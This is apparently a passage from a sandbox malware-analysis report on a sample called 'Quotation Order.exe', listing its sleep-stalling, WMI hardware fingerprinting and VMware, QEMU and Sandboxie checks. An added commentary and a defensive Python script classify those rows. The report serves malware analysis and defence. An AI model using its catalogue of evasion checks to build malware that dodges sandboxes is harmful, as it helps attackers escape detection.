                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98782s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98658s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98532s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98298s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97579s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97454s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -97329s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe TID: 4200 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6368 Thread sleep count: 2134 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99884s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99778s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6368 Thread sleep count: 2482 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99553s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99313s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -99063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98704s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98335s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -98110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97860s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -97360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8016 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
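The rows above mix several anti-analysis techniques: sandbox DLL and Wine export names in memory (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME), probes for VMware and VirtualBox driver files and for BIOS, SCSI and display-adapter strings in the registry, hardware fingerprinting over WMI (Win32_BaseBoard, Win32_ComputerSystem, Win32_Processor), and sleep-based stalling. The following triage script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses rows of this shape and groups them by technique and process. The category names and lookup tables are my own, the sample rows are copied from the table above (one source per row), and two readings are assumptions rather than report facts: that the sleep numbers are milliseconds (the threshold 30000 matches the 30 s Joe Sandbox compares against), and that 922337203685477 is 2**63 100-ns ticks rendered in milliseconds, i.e. an infinite wait rather than a timed sleep. Process labels keep the parent directory so the dropped Roaming\svchost.exe is not merged with the real System32\svchost.exe.

```python
"""Triage helper for Joe Sandbox "Malware Analysis System Evasion" rows.
Added example, not part of the report: groups "Source: <process> <behaviour>"
rows by the anti-analysis technique they evidence."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# 2**63 100-ns ticks in milliseconds: what the report prints for a relative wait of
# LARGE_INTEGER.MinValue, i.e. an infinite wait (interpretation, not stated by the report).
INFINITE_WAIT_MS = 2**63 // 10_000  # 922337203685477

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?:TID: (?P<tid>\d+) )?"
    r"(?P<action>Binary or memory string|File opened / queried|Registry key queried"
    r"|WMI Queries|Thread sleep time|Thread sleep count|Thread delayed|Memory allocated): "
    r"(?P<detail>.*)$")

SANDBOX_STRINGS = {"sbiedll.dll": "Sandboxie DLL name", "wine_get_unix_file_name": "Wine export name"}
VM_FILES = {"vmmouse.sys": "VMware mouse driver", "vmhgfs.sys": "VMware shared-folder driver",
            "vboxmouse.sys": "VirtualBox mouse driver", "ven_vmware": "VMware virtual disk ID"}
VM_REGISTRY = {"scsi port": "SCSI disk identifier (carries the vendor string)",
               "systembiosversion": "system BIOS version string",
               "videobiosversion": "video BIOS version string",
               r"services\disk\enum": "disk device enumeration",
               "driverdesc": "display adapter driver description"}
WMI_CLASSES = {"win32_baseboard": "Win32_BaseBoard", "win32_computersystem": "Win32_ComputerSystem",
               "win32_processor": "Win32_Processor"}


def _lookup(table, text):
    """Note for the first table key that occurs in text, else None."""
    return next((note for key, note in table.items() if key in text), None)


def parse_line(line):
    """Split one row into source, optional TID, action and detail (None if unknown)."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Map a parsed row to (category, note), or None when it is not an evasion signal."""
    action, detail = rec["action"], rec["detail"]
    low = detail.lower()
    if action == "Binary or memory string":
        note = _lookup(SANDBOX_STRINGS, low)
        return ("sandbox-check", note) if note else None
    if action in ("File opened / queried", "Registry key queried"):
        note = _lookup(VM_FILES if action.startswith("File") else VM_REGISTRY, low)
        return ("vm-check", note) if note else None
    if action == "WMI Queries":
        cls = _lookup(WMI_CLASSES, low)
        return ("hw-fingerprint", cls) if cls else None
    if action in ("Thread sleep time", "Thread delayed"):
        # "-100000s >= -30000s" or "delay time: N": the numbers behave like
        # milliseconds (30000 is the 30 s threshold), which is assumed here.
        nums = [int(n) for n in re.findall(r"\d+", detail)] or [0]
        value, threshold = nums[0], (nums[1] if len(nums) > 1 else 30_000)
        if value == INFINITE_WAIT_MS:
            return "sleep-evasion", "infinite wait (2**63 ticks sentinel)"
        return ("sleep-evasion", f"{value / 1000:.0f} s sleep") if value >= threshold else None
    if action == "Thread sleep count":
        m = re.match(r"(\d+) > (\d+)", detail)
        return ("sleep-evasion", f"{m.group(1)} short sleeps in a loop") if m else None
    if action == "Memory allocated" and "memory write watch" in low:
        # Every .NET process in the report does this: context, not an indicator by itself.
        return "context", "write-watch heap reservation (typical of the .NET GC)"
    return None


def process_label(source):
    """'<parent dir>\\<image>' so the dropped Roaming\\svchost.exe is not merged with
    System32\\svchost.exe; memory-dump sources ("name, <dump id>") keep the image name."""
    p = PureWindowsPath(source.split(",")[0])
    return f"{p.parent.name}\\{p.name}" if p.parent.name else p.name


def summarize(lines):
    """{category: {process: [distinct notes]}} over every row that parses."""
    out = defaultdict(lambda: defaultdict(list))
    for line in lines:
        rec = parse_line(line)
        hit = classify(rec) if rec else None
        if hit and hit[1] not in out[hit[0]][process_label(rec["source"])]:
            out[hit[0]][process_label(rec["source"])].append(hit[1])
    return {cat: dict(procs) for cat, procs in out.items()}


# Constructed sample: rows copied from the report table above, one source each.
SAMPLE_LINES = [
    r"Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL",
    r"Source: C:\Users\user\AppData\Roaming\svchost.exe File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys",
    r"Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -100000s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7940 Thread sleep count: 1269 > 30",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 11E0000 memory reserve | memory write watch",
]

if __name__ == "__main__":
    for category, procs in summarize(SAMPLE_LINES).items():
        print(category, *(f"\n  {p}: {'; '.join(n)}" for p, n in procs.items()))
```

Feed it the whole behaviour table (after restoring the space between the source and behaviour cells, as done above) rather than the sample and the vm-check and hw-fingerprint rows collapse to two processes: the dropped Roaming\svchost.exe does the driver and registry probing, while the injected AddInProcess32.exe and CasPol.exe hosts do the WMI fingerprinting and the sleep loops. The write-watch allocations appear for every .NET image in the run, including the legitimate framework hosts, which is why the script files them as context rather than as an indicator.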
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
                    Source: C:\Users\user\Desktop\Quotation Order.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98916
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96602
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96157
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95767
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95649
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99123
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98997
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98317
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97296
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97076
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99868
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99137
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99017
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98298
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97454
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97329
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99884
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99778
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99553
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 99063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 98110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 97360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
                    Source: Amcache.hve.35.drBinary or memory string: VMware
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.35.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
